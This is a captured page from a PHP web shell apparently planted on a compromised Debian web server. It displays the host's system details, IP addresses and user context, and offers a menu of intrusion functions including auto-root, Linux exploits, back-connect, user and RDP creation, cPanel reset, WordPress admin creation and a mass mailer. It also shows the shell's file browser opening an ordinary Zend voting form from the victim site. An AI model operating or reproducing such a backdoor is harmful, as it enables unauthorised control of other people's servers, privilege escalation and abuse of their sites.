Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.225.54.147
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
leksykografia /
application /
forms /
[ HOME SHELL ]
Name
Size
Permission
Action
Page.php
3.2
KB
-rw-r--r--
Partner.php
2.1
KB
-rw-r--r--
Vote.php
2.04
KB
-rw-r--r--
VoteAdmin.php
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Vote.php
<?php class Application_Form_Vote extends Zend_Form { public function init() { $voteMapper = new Application_Model_VoteMapper(); $votes = $voteMapper->fetchAllActive(); // Set the method for the display form to POST $this->setMethod('post'); $this->setEnctype(Zend_Form::ENCTYPE_MULTIPART); $this->setDisableLoadDefaultDecorators(true); $this->addDecorator('FormElements') ->addDecorator('HtmlTag') ->addDecorator('Form'); $page = new Application_Model_Page(); $pageMapper = new Application_Model_PageMapper(); // Add an email element foreach($votes as $vote) { $pageMapper->find($vote->getPage(), $page); $voteRadio = new Zend_Form_Element_Radio('voteRadio'.$vote->getId(), array( 'label' => $page->getTitle(), 'required' => false, )); $voteRadio->setSeparator(' '); $voteRadio->addMultiOption('1','1'); $voteRadio->addMultiOption('2','2'); $voteRadio->addMultiOption('3','3'); $voteRadio->addMultiOption('4','4'); $voteRadio->addMultiOption('5','5'); if(isset($_COOKIE['voteRadio'.$vote->getId()]) && $_COOKIE['voteRadio'.$vote->getId()] == '1') $voteRadio->setAttrib('disabled', true); $this->addElement($voteRadio); $this->addDisplayGroup(array('voteRadio'.$vote->getId()), 'voteRadioa'.$vote->getId()); $group = $this->getDisplayGroup ('voteRadioa'.$vote->getId()); $group->removeDecorator ('Zend_Form_Decorator_DtDdWrapper'); } // Add the submit button $this->addElement('submit', 'submit', array( 'ignore' => true, 'label' => 'Zatwierdź', )); } }
Close